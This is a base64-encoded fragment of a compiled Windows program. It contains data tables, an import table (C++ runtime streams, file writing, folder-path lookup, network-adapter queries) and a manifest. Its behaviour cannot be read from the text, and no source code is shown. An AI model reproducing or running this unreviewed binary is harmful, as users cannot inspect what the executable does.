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AAsAAAAMAAAAAQAAAKhtQAD/////sFBAAAAAAAC7UEAAAQAAAMZQQAABAAAAAAAAAAMAAADRUEAAAwAAANxQQAAFAAAA61BAAAEAAAAAAAAAAQAAAAAAAAAIAAAA91BAAAgAAAACUUAACgAAABFRQAABAAAAAAAAAP////9FUUAAIgWTGQEAAAB8bkAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAA/v///wAAAADQ////AAAAAP7///9XRUAAa0VAAAAAAAD+////AAAAAMz///8AAAAA/v///xdHQABAR0AAAAAAAP7///8AAAAA1P///wAAAAD+////AAAAAJ1HQAAAAAAA/v///wAAAADM////AAAAAP7///8AAAAA00hAAAAAAAD+////AAAAANj///8AAAAA/v///8tLQADeS0AA/////3BRQAAiBZMZAQAAAERvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAD/////oFFAAP////+oUUAAAQAAAAAAAAABAAAAAAAAAP////+wUUAAQAAAAAAAAAAAAAAA1BNAAAIAAAACAAAAAwAAAAEAAACYb0AAIgWTGQUAAABwb0AAAQAAAKhvQAAAAAAAAAAAAAAAAAABAAAAWHIAAAAAAAAAAAAAdHIAAABiAACkcAAAAAAAAAAAAABefgAATGAAAHxxAAAAAAAAAAAAABKBAAAkYQAAWHAAAAAAAAAAAAAA+IEAAABgAABgcAAAAAAAAAAAAABegwAACGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA5oEAAAAAAAAYgwAACIMAAO6CAADaggAAvIIAAKCCAABEgwAAeIIAAGiCAABYggAAQoIAACSCAAAcggAABoIAAIyCAAAugwAAAAAAALp0AADkdAAAGHUAAFh1AACEdQAApHUAAMR1AADodQAAJnYAAEB2AABedgAAhnYAAKB2AADcdgAAHHcAAF53AACidwAA4ncAACh4AABueAAAuHgAAPZ4AABCeQAAWHkAAJR5AADgeQAABnoAAEB6AACCegAArnoAAMZ6AAD6egAAMHsAAJp7AADQewAAFHwAAEZ8AAB8fAAAtnwAACB9AABYfQAAsH0AAPB9AAAWfgAAvHIAAN5yAAAkcwAAYnMAAKJzAADkcwAANHQAAHR0AACAcgAAAAAAALx/AADGfwAA1H8AAOR/AADufwAA+H8AAASAAAAOgAAAGIAAACSAAAAugAAAOIAAAEKAAABKgAAAVIAAAGKAAABygAAAfIAAAISAAACSgAAAmoAAAKaAAACygAAAwIAAANaAAADqgAAA9oAAAACBAAAggQAANIEAAD6BAABMgQAAVIEAAF6BAAB0gQAAjoEAAKCBAACwgQAAtH8AAKx/AACcfwAAen8AAEB/AAAqfwAAFH8AAPZ+AADsfgAA4n4AANh+AACsfgAAjH4AAGx+AABafwAAyH4AAAAAAABgcgAAAAAAAL8AU0hHZXRGb2xkZXJQYXRoQQAAU0hFTEwzMi5kbGwApwI/Y291dEBzdGRAQDNWPyRiYXNpY19vc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQDFAQQAADQY/dW5jYXVnaHRfZXhjZXB0aW9uQHN0ZEBAWUFfTlhaAMgFP3NwdXRuQD8kYmFzaWNfc3RyZWFtYnVmQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUFFX0pQQkRfSkBaAABTAj9fT3NmeEA/JGJhc2ljX29zdHJlYW1ARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBRQUVYWFoAAMUFP3NwdXRjQD8kYmFzaWNfc3RyZWFtYnVmQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUFFSERAWgCRAz9mbHVzaEA/JGJhc2ljX29zdHJlYW1ARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBRQUVBQVYxMkBYWgAPAT8/Nj8kYmFzaWNfb3N0cmVhbUBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRUFBVjAxQFA2QUFBVjAxQEFBVjAxQEBaQFoAAJwFP3NldHN0YXRlQD8kYmFzaWNfaW9zQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUFFWEhfTkBaAABrAz9lbmRsQHN0ZEBAWUFBQVY/JGJhc2ljX29zdHJlYW1ARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAMUBBQVYyMUBAWgAAngE/X0RlY3JlZkBmYWNldEBsb2NhbGVAc3RkQEBRQUVQQVYxMjNAWFoA0gE/X0dldGdsb2JhbGxvY2FsZUBsb2NhbGVAc3RkQEBDQVBBVl9Mb2NpbXBAMTJAWFoAAPYBP19Jbml0QD8kYmFzaWNfc3RyZWFtYnVmQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBASUFFWFhaAACRAj9hbHdheXNfbm9jb252QGNvZGVjdnRfYmFzZUBzdGRAQFFCRV9OWFoAAIwCP19YbGVuZ3RoX2Vycm9yQHN0ZEBAWUFYUEJEQFoAjgI/X1hvdXRfb2ZfcmFuZ2VAc3RkQEBZQVhQQkRAWgDzAT9fSW5jcmVmQGZhY2V0QGxvY2FsZUBzdGRAQFFBRVhYWgCwAT9fR2V0Y2F0QD8kY29kZWN2dEBEREhAc3RkQEBTQUlQQVBCVmZhY2V0QGxvY2FsZUAyQFBCVjQyQEBaAJ4APz8xX0xvY2tpdEBzdGRAQFFBRUBYWgAA7wE/X0lkX2NudEBpZEBsb2NhbGVAc3RkQEAwSEEA/wM/aWRAPyRjb2RlY3Z0QERESEBzdGRAQDJWMGxvY2FsZUAyQEEAAGAAPz8wX0xvY2tpdEBzdGRAQFFBRUBIQFoAgQA/PzE/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFVBRUBYWgAANwI/X0xvY2tAPyRiYXNpY19zdHJlYW1idWZARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBVQUVYWFoAAIICP19VbmxvY2tAPyRiYXNpY19zdHJlYW1idWZARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBVQUVYWFoAAKwFP3Nob3dtYW55Y0A/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQE1BRV9KWFoACgY/dWZsb3dAPyRiYXNpY19zdHJlYW1idWZARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBNQUVIWFoAADUGP3hzZ2V0bkA/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQE1BRV9KUEFEX0pAWgA4Bj94c3B1dG5APyRiYXNpY19zdHJlYW1idWZARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBNQUVfSlBCRF9KQFoAjAU/c2V0YnVmQD8kYmFzaWNfc3RyZWFtYnVmQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBATUFFUEFWMTJAUEFEX0pAWgDnBT9zeW5jQD8kYmFzaWNfc3RyZWFtYnVmQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBATUFFSFhaACwEP2ltYnVlQD8kYmFzaWNfc3RyZWFtYnVmQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBATUFFWEFCVmxvY2FsZUAyQEBaAACaAT9fQkFET0ZGQHN0ZEBAM19KQgAAJgA/PzA/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQElBRUBYWgAA7AM/Z2V0bG9jQD8kYmFzaWNfc3RyZWFtYnVmQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUJFP0FWbG9jYWxlQDJAWFoAAKgBP19GaW9wZW5Ac3RkQEBZQVBBVV9pb2J1ZkBAUEJESEhAWgAAeAA/PzE/JGJhc2ljX2lvc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAVUFFQFhaAFkCP19QbmluY0A/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQElBRVBBRFhaACkCP19Jb3NfYmFzZV9kdG9yQGlvc19iYXNlQHN0ZEBAQ0FYUEFWMTJAQFoAYAE/P183aW9zX2Jhc2VAc3RkQEA2QkAAPAE/P183PyRiYXNpY19pb3NARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEA2QkAAAHUAPz8xPyRiYXNpY19pb3NARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBVQUVAWFoAAAoAPz8wPyRiYXNpY19pb3N0cmVhbUBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRUBQQVY/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEAxQEBaAAAwBD9pbkA/JGNvZGVjdnRARERIQHN0ZEBAUUJFSEFBSFBCRDFBQVBCRFBBRDNBQVBBREBaAACRBT9zZXRnQD8kYmFzaWNfc3RyZWFtYnVmQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBASUFFWFBBRDAwQFoAABUGP3Vuc2hpZnRAPyRjb2RlY3Z0QERESEBzdGRAQFFCRUhBQUhQQUQxQUFQQURAWgAA5gQ/b3V0QD8kY29kZWN2dEBEREhAc3RkQEBRQkVIQUFIUEJEMUFBUEJEUEFEM0FBUEFEQFoAfgA/PzE/JGJhc2ljX29zdHJlYW1ARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBVQUVAWFoAABwAPz8wPyRiYXNpY19vc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUFFQFBBVj8kYmFzaWNfc3RyZWFtYnVmQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQDFAX05AWgBFAT8/Xzc/JGJhc2ljX29zdHJlYW1ARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEA2QkAAABEBPz82PyRiYXNpY19vc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUFFQUFWMDFAUDZBQUFWaW9zX2Jhc2VAMUBBQVYyMUBAWkBaAAAJAT8/Nj8kYmFzaWNfb3N0cmVhbUBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRUFBVjAxQElAWgAApQU/c2V0d0BzdGRAQFlBP0FVPyRfU21hbmlwQF9KQDFAX0pAWgAuBj93cml0ZUA/JGJhc2ljX29zdHJlYW1ARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBRQUVBQVYxMkBQQkRfSkBaAABNU1ZDUDEwMC5kbGwAACIAPz8wZXhjZXB0aW9uQHN0ZEBAUUFFQEFCUUJEQFoADQE/d2hhdEBleGNlcHRpb25Ac3RkQEBVQkVQQkRYWgBdAD8/MWV4Y2VwdGlvbkBzdGRAQFVBRUBYWgAAZQA/PzNAWUFYUEFYQFoAAM8FbWVtY3B5AADRBW1lbW1vdmUA0wVtZW1zZXQAABUAPz8wYmFkX2Nhc3RAc3RkQEBRQUVAUEJEQFoAADoBX19DeHhGcmFtZUhhbmRsZXIzAAAhAV9DeHhUaHJvd0V4Y2VwdGlvbgAAWQA/PzFiYWRfY2FzdEBzdGRAQFVBRUBYWgAUAD8/MGJhZF9jYXN0QHN0ZEBAUUFFQEFCVjAxQEBaACQAPz8wZXhjZXB0aW9uQHN0ZEBAUUFFQEFCVjAxQEBaAABjAD8/MkBZQVBBWElAWgAAegVmZ2V0YwCFBWZwdXRjAB8GdW5nZXRjAAAkA19sb2NrX2ZpbGUAAI4EX3VubG9ja19maWxlAAB5BWZmbHVzaAAA6wVzZXR2YnVmANAFbWVtY3B5X3MAAJYFZndyaXRlAAB7BWZnZXRwb3MAWQJfZnNlZWtpNjQAkgVmc2V0cG9zAHYFZmNsb3NlAADAA19ta2RpcgAAiwVmcmVlAADEBW1hbGxvYwAAxQFfYW1zZ19leGl0AABjAV9fZ2V0bWFpbmFyZ3MA3AFfY2V4aXQAACoCX2V4aXQALQFfWGNwdEZpbHRlcgBzBWV4aXQAAGQBX19pbml0ZW52ALACX2luaXR0ZXJtALECX2luaXR0ZXJtX2UA7AFfY29uZmlndGhyZWFkbG9jYWxlAKIBX19zZXR1c2VybWF0aGVycgAA6wFfY29tbW9kZQAARQJfZm1vZGUAAJ8BX19zZXRfYXBwX3R5cGUAAE1TVkNSMTAwLmRsbAAAAgE/dGVybWluYXRlQEBZQVhYWgCNBF91bmxvY2sAWwFfX2RsbG9uZXhpdAAjA19sb2NrAMkDX29uZXhpdAD7AV9jcnRfZGVidWdnZXJfaG9vawAAIQJfZXhjZXB0X2hhbmRsZXI0X2NvbW1vbgC4Al9pbnZva2Vfd2F0c29uAADvAV9jb250cm9sZnBfcwAA7gA/X3R5cGVfaW5mb19kdG9yX2ludGVybmFsX21ldGhvZEB0eXBlX2luZm9AQFFBRVhYWgAAPwBHZXRBZGFwdGVyc0luZm8ASVBITFBBUEkuRExMAADsAkludGVybG9ja2VkRXhjaGFuZ2UAsgRTbGVlcADpAkludGVybG9ja2VkQ29tcGFyZUV4Y2hhbmdlAADTAkhlYXBTZXRJbmZvcm1hdGlvbgAA6gBFbmNvZGVQb2ludGVyAMoARGVjb2RlUG9pbnRlcgDABFRlcm1pbmF0ZVByb2Nlc3MAAMABR2V0Q3VycmVudFByb2Nlc3MA0wRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAKUEU2V0VW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAAADSXNEZWJ1Z2dlclByZXNlbnQApwNRdWVyeVBlcmZvcm1hbmNlQ291bnRlcgCTAkdldFRpY2tDb3VudAAAxQFH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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA